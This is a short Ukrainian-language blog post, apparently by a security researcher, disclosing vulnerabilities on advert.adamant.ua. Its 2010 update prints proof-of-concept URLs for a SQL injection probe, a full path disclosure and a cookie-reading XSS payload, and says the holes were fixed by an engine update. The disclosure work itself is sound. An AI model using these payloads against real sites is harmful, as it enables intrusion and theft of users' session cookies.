Уразливості на adamant.ua
15:17 12.07.201005.12.2009
У квітні, 17.04.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на сайті http://adamant.ua (зокрема http://advert.adamant.ua). Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно проектів компанії Адамант раніше я писав про уразливість на holms.adamant.ua.
Детальна інформація про уразливості з’явиться пізніше.
12.07.2010
SQL Injection:
http://advert.adamant.ua/www/delivery/ac.php?bannerid=-1%20or%20version()%3E4
Full path disclosure:
http://advert.adamant.ua/www/delivery/fc.php?MAX_type=1
XSS:
http://advert.adamant.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E
Дані уразливості вже виправлені (за рахунок оновлення движка).